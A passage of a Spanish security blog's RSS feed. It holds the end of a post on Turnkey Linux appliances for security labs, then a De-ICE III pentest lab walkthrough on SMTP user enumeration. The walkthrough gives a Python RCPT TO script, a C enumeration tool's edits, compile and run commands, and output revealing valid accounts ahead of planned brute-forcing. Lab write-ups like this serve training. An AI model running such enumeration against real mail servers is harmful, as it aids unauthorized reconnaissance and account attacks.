			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática.</p>
<p style="text-align: justify;"><span id="more-509"></span><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas y plataformas tecnológicas de uso común en empresas, instituciones académicas y gobierno electrónico.</p>
<p style="text-align: justify;">Estas imágenes (.iso y/o VMware) automáticamente una vez iniciadas pondrán en marcha el sistema que nosotros hayamos elegido. Habilitando además un perfecto sistema de administración como lo es <a href="http://www.webmin.com/" target="_blank"><strong>Webmin</strong></a> (aunque podemos administrarlo normalmente de manera local).</p>
<p style="text-align: justify;">Veamos un video demostrativo del proceso de ejecución de los entornos/appliances:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;">Dichos sistemas están basados en la distribución Ubuntu, por lo que el proceso de actualización y administración se facilitará en gran medida.</p>
<p style="text-align: justify;">El uso de dicho proyecto como ambientes virtualizados de entrenamiento en seguridad es muy amplio. Pues con unos simple pasos (Descargar, bootear desde un equipo físico o máquina virtual) tendremos todo un entorno que asemejará uno real, para realizar las prácticas propuestas como entrenamiento (<a href="http://www.sec-track.com/aseguramiento" target="_blank"><strong>Hardening</strong></a>, <strong><a href="http://www.sec-track.com/test-de-penetracion" target="_blank">Penetration Test</a></strong>, <a href="http://www.sec-track.com/tag/vulnerability-scanning" target="_blank"><strong>Análisis  de Código en busca de vulnerabilidades</strong></a>, <a href="http://www.sec-track.com/criptografia" target="_blank"><strong>Análisis de Sistemas Criptográficos</strong></a>, <a href="http://www.sec-track.com/informatica-forense" target="_blank"><strong>Análisis Forense</strong></a>, <strong><a href="http://www.sec-track.com/?s=retos" target="_blank">CTF y Wargames</a></strong>).</p>
<p style="text-align: justify;">Algunos de los entornos disponibles son:</p>
<ul>
<li><a href="http://www.turnkeylinux.org/lamp" target="_blank">LAMP</a></li>
<li><a href="http://www.turnkeylinux.org/drupal6" target="_blank">Drupal</a></li>
<li><a href="http://www.turnkeylinux.org/fileserver" target="_blank">File Server</a></li>
<li><a href="http://www.turnkeylinux.org/openbravo" target="_blank">OpenBravo</a></li>
<li><a href="http://www.turnkeylinux.org/zimbra" target="_blank">Zimbra</a></li>
<li><a href="http://www.turnkeylinux.org/redmine" target="_blank">Redmine</a></li>
<li><a href="http://www.turnkeylinux.org/rails" target="_blank">Ruby on Rails</a></li>
<li><a href="http://www.turnkeylinux.org/torrentserver" target="_blank">Torrent Server</a></li>
<li><a href="http://www.turnkeylinux.org/domain-controller" target="_blank">Domain Controller</a></li>
<li><a href="http://www.turnkeylinux.org/moodle" target="_blank">Moodle</a></li>
<li><a href="http://www.turnkeylinux.org/mediawiki" target="_blank">MediaWiki</a></li>
<li><a href="http://www.turnkeylinux.org/wordpress" target="_blank">WordPress</a></li>
<li><a href="http://www.turnkeylinux.org/joomla" target="_blank">Joomla</a></li>
<li><a href="http://www.turnkeylinux.org/postgresql" target="_blank">PostGreSQL</a></li>
<li><a href="http://www.turnkeylinux.org/tomcat-apache" target="_blank">Tomcat on Apache</a></li>
<li><a href="http://www.turnkeylinux.org/phpbb" target="_blank">phpBB</a></li>
<li><a href="http://www.turnkeylinux.org/lapp" target="_blank">LAPP</a></li>
<li><a href="http://www.turnkeylinux.org/dokuwiki" target="_blank">DokuWiki</a></li>
<li><a href="http://www.turnkeylinux.org/projectpier" target="_blank">ProjectPier</a></li>
<li><a href="http://www.turnkeylinux.org/symfony" target="_blank">Symfony</a></li>
<li><a href="http://www.turnkeylinux.org/bugzilla" target="_blank">BugZilla</a></li>
<li><a href="http://www.turnkeylinux.org/mantis" target="_blank">Mantis</a></li>
<li><a href="http://www.turnkeylinux.org/ec2sdk" target="_blank">SDK for Amazon EC2</a></li>
</ul>
<p><a href="http://www.turnkeylinux.org/screenshots" target="_blank"><strong>ScreenShots del proyecto &gt;&gt;</strong></a></p>
<p><strong><a href="http://www.turnkeylinux.org/docs/installation-appliances-virtualbox" target="_blank">Tutorial de Instalaciónen VirtualBox &gt;&gt;</a></strong></p>
<p><a href="http://www.turnkeylinux.org" target="_blank"><strong>Más información y descargas del Proyecto Turnkey Linux &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Enumeración de usuarios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios#comments</comments>
		<pubDate>Fri, 12 Mar 2010 17:41:18 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Enumeración de usuarios]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[SMTP]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=496</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos. Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles: 192.168.2.100 21/tcp  open   ftp      vsftpd 2.0.4 22/tcp  open   ssh      OpenSSH [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <a title="Permanent Link to Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning">Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning</a></p>
<p style="text-align: justify;">Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos.</p>
<p style="text-align: justify;">Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles:</p>
<p style="text-align: justify;"><span id="more-496"></span><strong>192.168.2.100 </strong></p>
<p style="text-align: justify;">21/tcp  open   ftp      vsftpd 2.0.4<br />
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)<br />
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7<br />
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
110/tcp open   pop3     Openwall popa3d<br />
143/tcp open   imap     UW imapd 2004.357<br />
443/tcp closed https</p>
<p style="text-align: justify;"><strong>192.168.2.101</strong></p>
<p style="text-align: justify;">80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)</p>
<p style="text-align: justify;">Realicemos una exploración manual al sitio web <strong>192.168.2.100</strong> en busca de información sensible o de interés para nuestros propósitos:</p>
<p style="text-align: justify;">En el sitio web podemos encontrarnos un directorio de personas involucradas con la empresa:</p>
<p style="text-align: justify;">﻿﻿<strong>Development:</strong><br />
Samuel Pickwick &#8211; pickwick@herot.net<br />
Nathaniel Winkle &#8211; winkle@herot.net<br />
Augustus Snodgrass &#8211; snodgrass@herot.net<br />
Tracy Tupman &#8211; tupman@herot.net<br />
Sam Weller &#8211; weller@herot.net<br />
Tony Weller &#8211; tweller@herot.net<br />
Estella Havisham &#8211; havisham@herot.net<br />
Abel Magwitch &#8211; magwitch@herot.net<br />
Philip Pirrip &#8211; pirrip@herot.net</p>
<p><strong>Testing:</strong><br />
Nicholas Nickleby &#8211; nickleby@herot.net<br />
Ralph Nickleby &#8211; rnickleby@herot.net<br />
Newman Noggs &#8211; noggs@herot.net<br />
Wackford Squeers &#8211; squeers@herot.net<br />
Thomas Pinch &#8211; pinch@herot.net<br />
Mark Tapley &#8211; tapley@herot.net<br />
Sarah Gamp &#8211; gamp@herot.net</p>
<p><strong>Marketing:</strong><br />
Jacob Marley &#8211; marley@herot.net<br />
Ebenezer Scrooge &#8211; scrooge@herot.net<br />
Bob Cratchit &#8211; cratchit@herot.net</p>
<p><strong>Human Resources:</strong><br />
Bill Sikes &#8211; sikes@herot.net<br />
Jack Dawkins &#8211; dawkins@herot.net<br />
Noah Claypole &#8211; claypole@herot.net</p>
<p style="text-align: justify;">Posiblemente estos sean usuarios válidos en el sistema y pueda realizarse un inicio de sesión en alguno de los servicios disponibles en el sistema.</p>
<p style="text-align: justify;">Ahora exploremos el host <strong>192.168.2.101</strong>.</p>
<p style="text-align: justify;">En este nos encontramos una serie de políticas de uso/configuración de aplicaciones/actividades relacionadas con la administración y la seguridad del servidor.</p>
<ul>
<li> Software Installation Policy</li>
<li> Server Malware Protection Policy</li>
<li> Employee Internet Use Monitoring and Filtering Policy&#8221;</li>
<li> Acceptable Use Policy</li>
<li> Audit Vulnerability Scan Policy</li>
<li> Email Policy</li>
</ul>
<p style="text-align: justify;">Tratemos entonces de autenticarnos en alguno de los servicios disponibles haciendo uso del listado de posibles usuarios con passwords comunes/blanco/mismo-nombre-usuario.</p>
<p style="text-align: justify;">Primero depuremos el listado de posibles usuarios:</p>
<p style="text-align: justify;">pickwick<br />
winkle<br />
snodgrass<br />
tupman<br />
weller<br />
tweller<br />
havisham<br />
magwitch<br />
pirrip<br />
nickleby<br />
rnickleby<br />
noggs<br />
squeers<br />
pinch<br />
tapley<br />
gamp<br />
marley<br />
scrooge<br />
cratchit<br />
sikes<br />
dawkins<br />
claypole</p>
<p style="text-align: justify;">Ahora identifiquemos y verfiquemos los usuarios reales del sistema.</p>
<p style="text-align: justify;">Para esta actividad aplicaremos una técnica mostrada en un entorno anterior, pero ahora perfeccionada por <strong>Roguer </strong>(jollyroguer [at] gmail [dot] com)  quien ha desarrollado un script en python que automatizará esa consulta. Veamos:</p>
<p style="text-align: justify;"><a href="http://pastebin.com/NQ3iDrg1" target="_blank">#usensmtp.py</a></p>
<p style="text-align: justify;">######usensmtp.py######<br />
import getpass<br />
import sys<br />
import telnetlib</p>
<p>print &#8220;Welcome to usensmtp.py&#8221;<br />
print &#8220;Created by Roguer&#8221;<br />
host = raw_input(&#8220;Digite la ip del objetivo: &#8220;)<br />
port = raw_input(&#8220;Digite el puerto del objetivo: &#8220;)<br />
users_file = raw_input(&#8220;Digite el nombre del diccionario de usuarios: &#8220;)<br />
tn = telnetlib.Telnet(host,port)<br />
tn.write(&#8220;helo x&#8221; + &#8220;\n&#8221;)<br />
tn.write(&#8220;mail from: roguer@slax.example.net&#8221; + &#8220;\n&#8221;)</p>
<p style="text-align: justify;">#este valor puede cambiar para otros entornos<br />
print tn.read_until(&#8220;Sender ok&#8221;,1)<br />
inp = open(users_file,&#8221;r&#8221;)<br />
for linea in inp.readlines():<br />
tn.write(&#8220;rcpt to: &#8220;+ linea)<br />
print tn.read_until(&#8220;User unknown&#8221;,0.1)<br />
inp.close()<br />
tn.write(&#8220;quit&#8221; + &#8220;\n&#8221;)<br />
print &#8220;created by Roguer&#8221;<br />
print &#8220;jollyroguer@gmail.com&#8221;<br />
#### fin####</p>
<p style="text-align: justify;">También podemos utilizar la herramienta <a href="http://pentestmonkey.net/tools/smtp-user-enum/" target="_blank"><strong>smtp-user-enum</strong></a> que había mostrado en el primer entorno para los propósitos de enumeración de usuarios.</p>
<p style="text-align: justify;">Los resultados arrojados por el script de Roguer son los siguientes:</p>
<p style="text-align: justify;"><strong>root@bt: ~#python usensmtp.py</strong><br />
Welcome to usensmtp.py<br />
Created by Roguer<br />
Digite la ip del objetivo: 192.168.2.100<br />
Digite el puerto del objetivo: 25<br />
Digite el nombre del diccionario de usuarios: usuarios.txt<br />
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Thu, 4 Mar 2010<br />
08:07:24 GMT<br />
250 slax.example.net Hello [192.168.2.10], pleased to meet you<br />
250 2.1.0 roguer@slax.example.net&#8230; Sender ok<br />
250 2.1.5 root&#8230; Recipient ok<br />
550 5.1.1 pickwick&#8230; User unknown<br />
550 5.1.1 winkle&#8230; User unknown<br />
550 5.1.1 snodgrass&#8230; User unknown<br />
550 5.1.1 tupman&#8230; User unknown<br />
550 5.1.1 weller&#8230; User unknown<br />
550 5.1.1 tweller&#8230; User unknown<br />
250 2.1.5 havisham&#8230; Recipient ok<br />
250 2.1.5 magwitch&#8230; Recipient ok<br />
250 2.1.5 pirrip&#8230; Recipient ok<br />
550 5.1.1 nickleby&#8230; User unknown<br />
550 5.1.1 rnickleby&#8230; User unknown<br />
550 5.1.1 noggs&#8230; User unknown<br />
550 5.1.1 squeers&#8230; User unknown<br />
550 5.1.1 pinch&#8230; User unknown<br />
550 5.1.1 tapley&#8230; User unknown<br />
550 5.1.1 gamp&#8230; User unknown<br />
550 5.1.1 marley&#8230; User unknown<br />
550 5.1.1 scrooge&#8230; User unknown<br />
550 5.1.1 cratchit&#8230; User unknown<br />
550 5.1.1 sikes&#8230; User unknown<br />
550 5.1.1 dawkins&#8230; User unknown<br />
550 5.1.1 claypole&#8230; User unknown<br />
550 5.1.1 spickwick&#8230; User unknown<br />
550 5.1.1 nwinkle&#8230; User unknown<br />
550 5.1.1 asnodgrass&#8230; User unknown<br />
550 5.1.1 ttupman&#8230; User unknown<br />
550 5.1.1 sweller&#8230; User unknown<br />
550 5.1.1 tweller&#8230; User unknown<br />
550 5.1.1 ehavisham&#8230; User unknown<br />
550 5.1.1 amagwitch&#8230; User unknown<br />
550 5.1.1 ppirrip&#8230; User unknown<br />
550 5.1.1 nnickleby&#8230; User unknown<br />
550 5.1.1 rnickleby&#8230; User unknown<br />
550 5.1.1 nnoggs&#8230; User unknown<br />
550 5.1.1 wsqueers&#8230; User unknown<br />
550 5.1.1 tpinch&#8230; User unknown<br />
550 5.1.1 mtapley&#8230; User unknown<br />
550 5.1.1 sgamp&#8230; User unknown<br />
550 5.1.1 jmarley&#8230; User unknown<br />
550 5.1.1 escrooge&#8230; User unknown<br />
550 5.1.1 bcratchit&#8230; User unknown<br />
550 5.1.1 bsikes&#8230; User unknown<br />
550 5.1.1 jdawkins&#8230; User unknown<br />
550 5.1.1 nclaypole&#8230; User unknown<br />
550 5.1.1 samuel&#8230; User unknown<br />
550 5.1.1 nathaniel&#8230; User unknown<br />
550 5.1.1 augustus&#8230; User unknown<br />
550 5.1.1 tracy&#8230; User unknown<br />
550 5.1.1 sam&#8230; User unknown<br />
550 5.1.1 tony&#8230; User unknown<br />
550 5.1.1 estella&#8230; User unknown<br />
550 5.1.1 abel&#8230; User unknown<br />
550 5.1.1 philip&#8230; User unknown<br />
550 5.1.1 nicholas&#8230; User unknown<br />
550 5.1.1 ralph&#8230; User unknown<br />
550 5.1.1 newman&#8230; User unknown<br />
550 5.1.1 wackford&#8230; User unknown<br />
550 5.1.1 thomas&#8230; User unknown<br />
550 5.1.1 mark&#8230; User unknown<br />
550 5.1.1 sarah&#8230; User unknown<br />
550 5.1.1 jacob&#8230; User unknown<br />
550 5.1.1 ebenezer&#8230; User unknown<br />
550 5.1.1 bob&#8230; User unknown<br />
550 5.1.1 bill&#8230; User unknown<br />
550 5.1.1 jack&#8230; User unknown<br />
550 5.1.1 noah&#8230; User unknown<br />
550 5.1.1 samuelp&#8230; User unknown<br />
550 5.1.1 nathanielw&#8230; User unknown<br />
550 5.1.1 augustuss&#8230; User unknown<br />
550 5.1.1 tracyt&#8230; User unknown<br />
550 5.1.1 samw&#8230; User unknown<br />
550 5.1.1 tonyw&#8230; User unknown<br />
550 5.1.1 estellah&#8230; User unknown<br />
550 5.1.1 abelm&#8230; User unknown<br />
550 5.1.1 philipp&#8230; User unknown<br />
550 5.1.1 nicholasn&#8230; User unknown<br />
550 5.1.1 ralphn&#8230; User unknown<br />
550 5.1.1 newmann&#8230; User unknown<br />
550 5.1.1 wackfords&#8230; User unknown<br />
550 5.1.1 thomasp&#8230; User unknown<br />
550 5.1.1 markt&#8230; User unknown<br />
550 5.1.1 sarahg&#8230; User unknown<br />
550 5.1.1 jacobm&#8230; User unknown<br />
550 5.1.1 ebenezers&#8230; User unknown<br />
550 5.1.1 bobc&#8230; User unknown<br />
550 5.1.1 bills&#8230; User unknown<br />
550 5.1.1 jackd&#8230; User unknown<br />
created by Roguer<br />
jollyroguer @ gmail.com</p>
<p style="text-align: justify;">Para quienes represente algún inconveniente ejecutar el script en python, también existe otra herramienta escrita en C que me ha resultado bastante efectiva a la hora de realizar enumeración de usuarios a través del servicio SMTP con RCPT. Veamos:</p>
<p style="text-align: justify;"><a href="http://pastebin.com/euyMrB4E" target="_blank"><strong>SMTP (RCPT TO) User enumeration</strong></a></p>
<p style="text-align: justify;">Una ves descargado/copiado como <strong>rcpt2.c</strong> (foo.c) y editado el código según nuestras necesidades, procedemos a compilarlo para generar el binario.</p>
<p style="text-align: justify;"><strong>Edición:</strong></p>
<p style="text-align: justify;">Solo necesité editar las siguientes lineas (negrita):</p>
<p style="text-align: justify;">define PORT            25<br />
#define BUFFSIZE        2048<br />
#define NAME            &#8220;rcpt2&#8243;<br />
<strong>#define HELO            &#8220;HELO Sec-Track\n&#8221;</strong><br />
<strong>#define MAIL            &#8220;mail from:&lt;sectrack@slax.example.net&gt;\n&#8221;</strong><br />
#define RCPT2           &#8220;rcpt to: &#8220;</p>
<p style="text-align: justify;"><strong>Compilación:</strong></p>
<p style="text-align: justify;">root@bt:~# gcc rcpt2.c -o user_enumeration</p>
<p style="text-align: justify;"><strong>Ejecución:</strong></p>
<p><strong>root@bt:~# ./user_enumeration</strong><br />
rcpt2 by B-r00t. (c) 2003.<br />
Usage:  ./user_enumeration &lt;USERLIST&gt; &lt;HOST&gt;<br />
./user_enumeration usernames.txt smtp.acme.com</p>
<p><strong>Resultados:</strong></p>
<p>root@bt:~# ./user_enumeration users.txt 192.168.2.100<br />
rcpt2 by B-r00t. (c) 2003.<br />
Usernames from: users.txt<br />
RCPT TO username enumeration on 192.168.2.100.</p>
<p>BANNER: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Fri, 12 Mar 2010 11:35:30 GMT<br />
SEND: HELO avatar<br />
RECV: 250 slax.example.net Hello [192.168.2.1], pleased to meet you<br />
2010 11:35:30 GMT</p>
<p>SENT: mail from:&lt;avatar@slax.example.net&gt;<br />
RECV: 250 2.1.0 &lt;avatar@slax.example.net&gt;&#8230; Sender ok</p>
<p>VALID_USER: <strong>root</strong><br />
VALID_USER: <strong>havisham</strong><br />
VALID_USER: <strong>magwitch</strong><br />
VALID_USER: <strong>pirrip</strong></p>
<p>Sending RSET &amp; QUIT to 192.168.2.100</p>
<p>Ok Done!</p>
<p>Como se puede ver logramos obtener algunos de los usuarios del sistema. Estos son:</p>
<ul>
<li>root</li>
<li>havisham</li>
<li>magwitch</li>
<li>pirrip</li>
</ul>
<p>En el próximo post evaluaremos la posibilidad de autenticarnos con estos usuarios en los servicios disponibles (brute force, contraseñas débiles, etc). También trataremos de identificar vulnerabilidades en el sistema que nos permitan determinar posibles puntos de intrusión.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Served from: www.sec-track.com @ 2012-02-05 12:05:01 -->
